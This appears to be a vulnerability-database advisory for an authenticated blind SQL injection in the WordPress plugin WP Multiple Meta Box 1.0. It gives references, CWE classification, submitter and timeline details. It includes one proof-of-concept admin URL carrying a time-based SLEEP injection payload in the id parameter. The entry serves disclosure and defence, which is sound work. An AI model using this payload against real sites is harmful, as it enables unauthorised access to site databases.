WP Multiple Meta Box 1.0 - Authenticated Blind SQL Injection



Proof of Concept
http://www.example.com/wp-admin/admin.php?page=multi_metabox_listing&action=edit&id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))Etmx)

Affects Plugin

no known fix
- plugin closed

References

URL http://www.vulnerability-lab.com/get_content.php?id=1818
URL https://seclists.org/fulldisclosure/2016/Apr/35

Classification

Type SQLI
OWASP Top 10 A1: Injection
CWE CWE-89

Miscellaneous

Submitter firefart
Submitter Website https://firefart.at/
Submitter Twitter _FireFart_
Views 6772
Verified Yes
WPVDB ID 8437

Timeline

Publicly Published 2016-04-08 (about 4 years ago)
Added 2016-04-12 (about 4 years ago)
Last Updated 2019-10-31 (8 months ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin